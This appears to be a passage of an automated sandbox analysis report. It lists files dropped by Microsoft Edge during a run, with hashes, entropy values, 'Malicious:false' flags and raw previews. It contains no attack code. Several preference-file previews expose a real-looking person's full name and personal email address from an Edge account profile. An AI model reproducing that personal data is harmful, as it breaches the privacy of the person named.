SHA-512:C921EE59A1055314275E590B74A0920B82DC151B45551AE92BAB59CB035333D031ACA87058C859CC99CD6FD23D27CE1898094DC26A641A9D9356C3DB72FC33EC
Malicious:false
Preview:SQLite format 3......@ ..........................................................................S`.........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):270336
Entropy (8bit):0.0012471779557650352
Encrypted:false
SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:F50F89A0A91564D0B8A211F8921AA7DE
SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):6
Entropy (8bit):2.2516291673878226
Encrypted:false
SSDEEP:3:lg9l:69l
MD5:A9851AA4C3C8AF2D1BD8834201B2BA51
SHA1:FA95986F7EBFAC4AAB3B261D3ED0A21B142E91FC
                                                                                                                                                                                                        SHA-256:E708BE5E34097C8B4B6ECB50EAD7705843D0DC4B0779B95EF57073D80F36C191
                                                                                                                                                                                                        SHA-512:41A1B4D650FF55B164F3DB02C8440F044C4EC31D8DDBBBF56195D4E27473C6B1379DFAD3581E16429650E2364791F5C19AAE723EFC11986BB986EF262538B818
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):365
                                                                                                                                                                                                        Entropy (8bit):5.228882812258267
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNID1CN23oH+Tcwt8age8Y55HEZzXELIx2KLlVUz1fNcSF34q2PCN23oH+Tu:+1fNILYeb8rcHEZrEkVL21fNcSOv1Yeq
                                                                                                                                                                                                        MD5:08FAF2F93D90EC211EE2FA52F40F7A6B
                                                                                                                                                                                                        SHA1:EF488343D1AFEB49B67C2B2A493130B7D748CF07
                                                                                                                                                                                                        SHA-256:E0E232784742D60589781644B091BB870B1B769606A3C18465915BA05F645673
                                                                                                                                                                                                        SHA-512:68473E5AC989626101F5BD5728B043165EFACB8D85CC7CBFC30265F3005C3AAC38851DD406950C694257747A52ECC0055C0713FC32DA35E9C6AAD380616E7FB2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.586 330 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2024/11/11-02:11:11.608 330 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):854
                                                                                                                                                                                                        Entropy (8bit):5.604016836086792
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:OXWHWbzdEBHT6bXBH9VavlW1/YYISMXPhPf+14YOzHb6q0OSeRlMRE8+x2NeF335:O+Wn6HTkxHq9WkLPf9XZa2374/zMyG
                                                                                                                                                                                                        MD5:5E1D89BE2A0F5561BDF78054B3E41153
                                                                                                                                                                                                        SHA1:9383565E85F3A7BCFBCD9C31FD2849C4A9505D36
                                                                                                                                                                                                        SHA-256:6E48A4F67169D3E157584169C11F79D71C670C59ABA5ACDFAFD64914AC0E877C
                                                                                                                                                                                                        SHA-512:7E3D49CA05B703ECD07C0CEF5676C65404B2708E4ACDCA5629A02FE072170F2032E94AC19C5E8BD31DEC7ADF050DC76FD4B1EB9B8B4818B59677D92DF7B45C33
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:._N..................VERSION.1..META:https://www.bing.com.........L.-_https://www.bing.com..cib__firstTimeAccessed..1691263998736./_https://www.bing.com..cib__vsFirstTimeAccessed..1691263998740..B.................META:https://ntp.msn.com.............!_https://ntp.msn.com..LastKnownPV..1731309075201.._https://ntp.msn.com..MUID!.3A48E362A70A6AE51906F656A6236B49.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1731309075185.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241109.37"}.#_https://ntp.msn.com..selectedPivot..myFeed.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Mon Nov 11 2024 02:11:18 GMT-0500 (Eastern Standard Time).!_https://ntp.msn.com..storageTest
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                        Entropy (8bit):5.02871881524622
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fN7nDM+q2PCN23oH+Tcwt8a2jMGIFUt8YUz1fN7ngZmw+YUz1fNeDMVkwOCZ:+1fN/M+v1Yeb8EFUt8Z1fNk/+Z1fNuMb
                                                                                                                                                                                                        MD5:C87CE2AD733D9EC29950C6D79333EC24
                                                                                                                                                                                                        SHA1:CDF226FA1542115C413DD5661DD92F5249D24871
                                                                                                                                                                                                        SHA-256:CF3CCEF186BED7DA628860A2DAFE8054D5E07D5AFBC473E19A2A6E8488EA4292
                                                                                                                                                                                                        SHA-512:B80D9C36824C688954124734BB07B74D1C783E94B9ECF1FE9BE26F8B082252CE82EA8945FDAD84343D7C6FC08C60C3C62DBCE06F67ED770CCA9B07B527160CC6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.200 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/11-02:11:11.200 13fc Recovering log #3.2024/11/11-02:11:11.201 13fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                        Entropy (8bit):5.02871881524622
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fN7nDM+q2PCN23oH+Tcwt8a2jMGIFUt8YUz1fN7ngZmw+YUz1fNeDMVkwOCZ:+1fN/M+v1Yeb8EFUt8Z1fNk/+Z1fNuMb
                                                                                                                                                                                                        MD5:C87CE2AD733D9EC29950C6D79333EC24
                                                                                                                                                                                                        SHA1:CDF226FA1542115C413DD5661DD92F5249D24871
                                                                                                                                                                                                        SHA-256:CF3CCEF186BED7DA628860A2DAFE8054D5E07D5AFBC473E19A2A6E8488EA4292
                                                                                                                                                                                                        SHA-512:B80D9C36824C688954124734BB07B74D1C783E94B9ECF1FE9BE26F8B082252CE82EA8945FDAD84343D7C6FC08C60C3C62DBCE06F67ED770CCA9B07B527160CC6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.200 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/11-02:11:11.200 13fc Recovering log #3.2024/11/11-02:11:11.201 13fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 3, database pages 9, cookie 0x5, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                        Entropy (8bit):0.4137784766694259
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TL1PD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFS:T1/qALihje9kqL42WOT/9F
                                                                                                                                                                                                        MD5:5AA0D6A2ECCE658F08BF5E58B9B36AD2
                                                                                                                                                                                                        SHA1:F1C9C69A80D845597628FFDC3618ED62593CE473
                                                                                                                                                                                                        SHA-256:9D16F84C9DA5A8CB2E660AE2E225B723EE6137DF147A56791375FC5B22CBABCA
SHA-512:B8D37839DB68392E92EA024FA8C54FF3B04D9E7E6DBF28B2AC34420E49614493FE387B0B35F5D3FB65F9D111DF68CCB70C9FC34943D0D07A93F3A70CF1F12C21
Malicious:false
Preview:SQLite format 3......@ ..........................................................................S`......,......\.t.+.>...,............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1262
Entropy (8bit):4.885962682697856
Encrypted:false
SSDEEP:24:Y2esatahVsatJ3aoas2hdsFdJ3RdsxdMHnUsRdMHE3QYhD07nby:Y2eVMhVVfqZs2zs3JzsbMHnUs7MH/Yh7
MD5:2F27B8C0CFED574E3183820517A7D726
SHA1:C28F2029F298843BB913F6BE5809567503798C01
SHA-256:7F56C09AF2036814C9A2DBD0E75CECB6BAE20BB78B200A15C78D09BDDB546579
SHA-512:BA8D0DC388329FCC002287C9177F96F86E12204495FB0A8530A23E25D8F6B9A97371E7D700E9191814B069D0155528C2ACCFC8BAF25925850B30334BC7A7B0DC
Malicious:false
Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://edge.microsoft.com","supports_spdy":true},{"isolation":[],"server":"https://substrate.office.com","supports_spdy":true},{"isolation":[],"server":"https://prod.rewardsplatform.microsoft.com","supports_spdy":true},{"isolation":[],"server":"https://edge.activity.windows.com","supports_spdy":true},{"isolation":[],"server":"https://arc.msn.com","supports_spdy":true},{"isolation":[],"server":"https://dns.quad9.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076793485","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076230742","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":118154},"server":"https://assets.msn.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375876272088042",

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):9000
Entropy (8bit):4.994257462742733
Encrypted:false
SSDEEP:192:18XcUTNk9jPcAWMdkxoouYI3+YJuRhFeB/NhK9:2cUTNk9jPcAWMdaooVIS/me9
MD5:3CB1586353968B52F028A678ED76E36E
SHA1:CA5D7CF1919B126888AE487BEF587ABA56CFC4C9
SHA-256:14842C0CB079FF70AC52A3DDEB82275D34E792F24A8CF9E229C3755A7014B382
SHA-512:DA5462C205157B953A8A2D87430C910B2B09ED2701D2110EA6A9AA0BC8CAC303479B2E09B87B069E1B30B29FFE70565BE544944D0CBF2E3255A80EEDFA30F54A
Malicious:false
Preview:{"account_id_migration_state":2,"account_info":[{"account_id":"000340011677ED77","accountcapabilities":{"can_offer_extended_chrome_sync_promos":-1},"edge_account_age_group":3,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_is_test_on_premises_profile":false,"edge_account_last_name":"Shapira","edge_account_location":"CH","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_data_protection_type":0,"edge_is_data_protection_target":false,"edge_wam_aad_for_app_account_type":0,"email":"shahak.shapira@outlook.com","full_name":"","gaia":"000340011677ED77","given_name":"","hd":"","is_supervised_child":-1,"is_under_advanced_protection":false,"last_downloaded_image_url_with_size":"","locale":"","picture_url":""}],"account_tracker_service_last_update":"13335737597040910","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):9000
Entropy (8bit):4.994257462742733
Encrypted:false
SSDEEP:192:18XcUTNk9jPcAWMdkxoouYI3+YJuRhFeB/NhK9:2cUTNk9jPcAWMdaooVIS/me9
MD5:3CB1586353968B52F028A678ED76E36E
SHA1:CA5D7CF1919B126888AE487BEF587ABA56CFC4C9
SHA-256:14842C0CB079FF70AC52A3DDEB82275D34E792F24A8CF9E229C3755A7014B382
SHA-512:DA5462C205157B953A8A2D87430C910B2B09ED2701D2110EA6A9AA0BC8CAC303479B2E09B87B069E1B30B29FFE70565BE544944D0CBF2E3255A80EEDFA30F54A
Malicious:false
Preview:{"account_id_migration_state":2,"account_info":[{"account_id":"000340011677ED77","accountcapabilities":{"can_offer_extended_chrome_sync_promos":-1},"edge_account_age_group":3,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_is_test_on_premises_profile":false,"edge_account_last_name":"Shapira","edge_account_location":"CH","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_data_protection_type":0,"edge_is_data_protection_target":false,"edge_wam_aad_for_app_account_type":0,"email":"shahak.shapira@outlook.com","full_name":"","gaia":"000340011677ED77","given_name":"","hd":"","is_supervised_child":-1,"is_under_advanced_protection":false,"last_downloaded_image_url_with_size":"","locale":"","picture_url":""}],"account_tracker_service_last_update":"13335737597040910","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):9000
Entropy (8bit):4.994257462742733
Encrypted:false
SSDEEP:192:18XcUTNk9jPcAWMdkxoouYI3+YJuRhFeB/NhK9:2cUTNk9jPcAWMdaooVIS/me9
MD5:3CB1586353968B52F028A678ED76E36E
SHA1:CA5D7CF1919B126888AE487BEF587ABA56CFC4C9
SHA-256:14842C0CB079FF70AC52A3DDEB82275D34E792F24A8CF9E229C3755A7014B382
SHA-512:DA5462C205157B953A8A2D87430C910B2B09ED2701D2110EA6A9AA0BC8CAC303479B2E09B87B069E1B30B29FFE70565BE544944D0CBF2E3255A80EEDFA30F54A
Malicious:false
Preview:{"account_id_migration_state":2,"account_info":[{"account_id":"000340011677ED77","accountcapabilities":{"can_offer_extended_chrome_sync_promos":-1},"edge_account_age_group":3,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_is_test_on_premises_profile":false,"edge_account_last_name":"Shapira","edge_account_location":"CH","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_data_protection_type":0,"edge_is_data_protection_target":false,"edge_wam_aad_for_app_account_type":0,"email":"shahak.shapira@outlook.com","full_name":"","gaia":"000340011677ED77","given_name":"","hd":"","is_supervised_child":-1,"is_under_advanced_protection":false,"last_downloaded_image_url_with_size":"","locale":"","picture_url":""}],"account_tracker_service_last_update":"13335737597040910","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 8, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):36864
Entropy (8bit):1.4452957416275574
Encrypted:false
SSDEEP:96:DIEumQv8m1ccnvS61kUrsSyszhyVsiuWfjsRlMxs7qYClsy:DIEumQv8m1ccnvS65yXuWf0+dR
MD5:CD82961944CF8FA952D0173990E4823E
SHA1:3FDDF3E5589EFDFC54A18AC885DE8673CBF6317F
SHA-256:EFB4617D275799AA53955F26BC6D4A49CD564EB9F608109D6BBA4184F0F2F581
SHA-512:1F0C71790839DF5EEEE61F42AA51F9FBC4F69743F11B65EA4691BB47968D89B2DA94FEBF4A0F517247790713F1D344725BEAE3FA48CCCE4501E35626295805CD
Malicious:false
Preview:SQLite format 3......@ ..........................................................................S`.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2491
Entropy (8bit):5.024582630822769
Encrypted:false
SSDEEP:48:YPj1m4Vr8KVNkGkXX6VVks0LtpsA1zd9crbJ/anUJaYPI7xaMGH1oB+Cm0sY6:KwoGX6VVOZpsAxdOrMn3YPo0MG6+Zc6
MD5:B88693A29632D7D9F60A1D83D654034B
SHA1:75CB7F2DADF55C38CA95C9C2E960021CB8CBD64C
SHA-256:3155F4952684317A20C528640599FDDCB214B509B41CFBD7B84B4D6AD2227553
SHA-512:2664739792728509C61A2ECC86E40F078CC8E1BAC8CFA7B12AE3A195D9FF82638C8B860187721A8FA4D89DB7D633D68938829D76213BBE87E3BA70562C39E7FD
Malicious:false
Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{}},"prefs":{"preference_reset_time":"13375782671147057"},"protection":{"macs":{"browser":{"show_home_button":"904452986128BBEE5A7B1FFB8F342100C3150E3D9FD76C4105DF33EB021E22FD"},"default_search_provider_data":{"template_url_data":"575D258E47F940C6887685ABA99A5839CBFE4BA30863349DFE0D0C375AAB8816"},"edge":{"services":{"account_id":"D456A886A0DBE318CF511789EB70CFBEB8B3E35DA05B44245AFA153CF2527082","identity":{"schema":"50E673A6E3700B5431DD5887049F3271B5C2BEA02D53D968CBD61D36F54D9292"},"last_account_id":"6A5B5A031791B5A5FA7238C8E3FDD8A324CC8F19F63EAD5B2E896B84A5786B51","last_username":"AEEC085E5852B256515B8A4CA04B9576AB6B11591758E5AF201224060FD694E8"}},"homepage":"B1E9FE8108A84F532486D13AAC43C0AFDA16D3DFC9EB2F743AEE11F89F2F163E","homepage_is_newtabpage":"3680F776D17E3C099431BAF5381FAB9BCC0C2C70FEA4C74D12324BC94A207119","media":{"cdm":{"origin_data":"CE16C9485175ED827C5B13C2EE9BFCEDDD3444AF290CF59B851C1B

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2491
Entropy (8bit):5.024582630822769
Encrypted:false
SSDEEP:48:YPj1m4Vr8KVNkGkXX6VVks0LtpsA1zd9crbJ/anUJaYPI7xaMGH1oB+Cm0sY6:KwoGX6VVOZpsAxdOrMn3YPo0MG6+Zc6
MD5:B88693A29632D7D9F60A1D83D654034B
SHA1:75CB7F2DADF55C38CA95C9C2E960021CB8CBD64C
SHA-256:3155F4952684317A20C528640599FDDCB214B509B41CFBD7B84B4D6AD2227553
SHA-512:2664739792728509C61A2ECC86E40F078CC8E1BAC8CFA7B12AE3A195D9FF82638C8B860187721A8FA4D89DB7D633D68938829D76213BBE87E3BA70562C39E7FD
Malicious:false
Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{}},"prefs":{"preference_reset_time":"13375782671147057"},"protection":{"macs":{"browser":{"show_home_button":"904452986128BBEE5A7B1FFB8F342100C3150E3D9FD76C4105DF33EB021E22FD"},"default_search_provider_data":{"template_url_data":"575D258E47F940C6887685ABA99A5839CBFE4BA30863349DFE0D0C375AAB8816"},"edge":{"services":{"account_id":"D456A886A0DBE318CF511789EB70CFBEB8B3E35DA05B44245AFA153CF2527082","identity":{"schema":"50E673A6E3700B5431DD5887049F3271B5C2BEA02D53D968CBD61D36F54D9292"},"last_account_id":"6A5B5A031791B5A5FA7238C8E3FDD8A324CC8F19F63EAD5B2E896B84A5786B51","last_username":"AEEC085E5852B256515B8A4CA04B9576AB6B11591758E5AF201224060FD694E8"}},"homepage":"B1E9FE8108A84F532486D13AAC43C0AFDA16D3DFC9EB2F743AEE11F89F2F163E","homepage_is_newtabpage":"3680F776D17E3C099431BAF5381FAB9BCC0C2C70FEA4C74D12324BC94A207119","media":{"cdm":{"origin_data":"CE16C9485175ED827C5B13C2EE9BFCEDDD3444AF290CF59B851C1B

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2491
Entropy (8bit):5.024582630822769
Encrypted:false
SSDEEP:48:YPj1m4Vr8KVNkGkXX6VVks0LtpsA1zd9crbJ/anUJaYPI7xaMGH1oB+Cm0sY6:KwoGX6VVOZpsAxdOrMn3YPo0MG6+Zc6
MD5:B88693A29632D7D9F60A1D83D654034B
SHA1:75CB7F2DADF55C38CA95C9C2E960021CB8CBD64C
SHA-256:3155F4952684317A20C528640599FDDCB214B509B41CFBD7B84B4D6AD2227553
SHA-512:2664739792728509C61A2ECC86E40F078CC8E1BAC8CFA7B12AE3A195D9FF82638C8B860187721A8FA4D89DB7D633D68938829D76213BBE87E3BA70562C39E7FD
Malicious:false
Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{}},"prefs":{"preference_reset_time":"13375782671147057"},"protection":{"macs":{"browser":{"show_home_button":"904452986128BBEE5A7B1FFB8F342100C3150E3D9FD76C4105DF33EB021E22FD"},"default_search_provider_data":{"template_url_data":"575D258E47F940C6887685ABA99A5839CBFE4BA30863349DFE0D0C375AAB8816"},"edge":{"services":{"account_id":"D456A886A0DBE318CF511789EB70CFBEB8B3E35DA05B44245AFA153CF2527082","identity":{"schema":"50E673A6E3700B5431DD5887049F3271B5C2BEA02D53D968CBD61D36F54D9292"},"last_account_id":"6A5B5A031791B5A5FA7238C8E3FDD8A324CC8F19F63EAD5B2E896B84A5786B51","last_username":"AEEC085E5852B256515B8A4CA04B9576AB6B11591758E5AF201224060FD694E8"}},"homepage":"B1E9FE8108A84F532486D13AAC43C0AFDA16D3DFC9EB2F743AEE11F89F2F163E","homepage_is_newtabpage":"3680F776D17E3C099431BAF5381FAB9BCC0C2C70FEA4C74D12324BC94A207119","media":{"cdm":{"origin_data":"CE16C9485175ED827C5B13C2EE9BFCEDDD3444AF290CF59B851C1B

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):5306
Entropy (8bit):3.4395372838812293
Encrypted:false
SSDEEP:96:qQIKp//4Yny8s3OmBiNBzfQZQMgCZK99Xp+b8+diOokiaI5SLl9iSrp1LEzVSl7F:qQRQYny8jmBiNBsKRp99Xp+wqiODij5s
MD5:A6B2CDCFCC7A468FE699294C0BCB8DA6
SHA1:BD34025706EFC42F8F0648FC0E3A965315BF83D7
                                                                                                                                                                                                        SHA-256:91318DC54E8479A86A512557AC6370166382800BCD5CB9BBAD7A828331034243
                                                                                                                                                                                                        SHA-512:4294FEADE666928D631F5E3694257BB4C1582124B1A421C857453124A9288DB6A377E0F1D7990903E7AAF0AE43B85A8BD1784649206E3BE85ACD71715D1EB51C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f.................&f.................V.b................next-map-id.1.Cnamespace-d4eca2c5_e32e_4506_9739_ee50740615a4-https://ntp.msn.com/.0u|.L.................map-0-shd_sweeper.&{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.e.h.p.s.b.t.q.l.t.,.p.r.g.-.c.a.l.-.5.c.o.l.u.m.n.,.x.a.d.s.-.a.d.q.i.s.c.b.m.m.-.a.a.,.a.d.s.-.f.l.r.m.g.p.-.n.o.i.s.e.-.t.,.s.i.d.-.f.l.r.n.o.i.s.e.2.,.p.r.g.-.1.s.w.-.s.a.e.e.f.b.t.1.,.p.r.g.-.1.s.w.-.s.a.-.d.n.n.-.r.m.-.c.a.l.i.b._.t.1.,.t.r.a.f.f.i.c.-.p.1.-.n.y.l.d.-.t.,.p.r.g.-.1.s.w.-.l.d.n.y.-.t.r.a.n.s.i.t.,.1.s.-.n.t.f.1.-.r.d.i.d.n.,.1.s.-.n.t.f.1.-.f.s.p.t.b.r.c.,.1.s.-.n.t.f.1.-.p.n.o.t.s.,.p.r.g.-.1.s.w.-.m.o.n.e.x.p.b.,.p.r.g.-.1.s.w.-.p.n.o.t.i.a.,.p.r.g.-.p.1.-.t.s.4.c.o.l.d.,.1.s.w.-.t.p.s.n.-.d.s.t.p.r.g.1.d.c.y.-.c.,.p.r.g.-.1.s.w.-.d.e.f.e.r.c.o.n.,.p.r.g.-.f.i.n.-.l.2.d.u.e.n.v.-.c.,.2.4.0.9.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                        Entropy (8bit):5.031095772949762
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNyDM+q2PCN23oH+TcwtrQMxIFUt8YUz1fNygZmw+YUz1fNr7pDMVkwOCN2n:+1fNKM+v1YebCFUt8Z1fN3/+Z1fNxMVq
                                                                                                                                                                                                        MD5:6743F8B20F1697F581C4EA7CB6E75176
                                                                                                                                                                                                        SHA1:B17B6C2EE2AFD364141E2F6064894CDDA75916A8
                                                                                                                                                                                                        SHA-256:E77E0FD44DBCFE2D0CAE90FD1D15CDB4C631A756656A842DF5B433E13F29AD4E
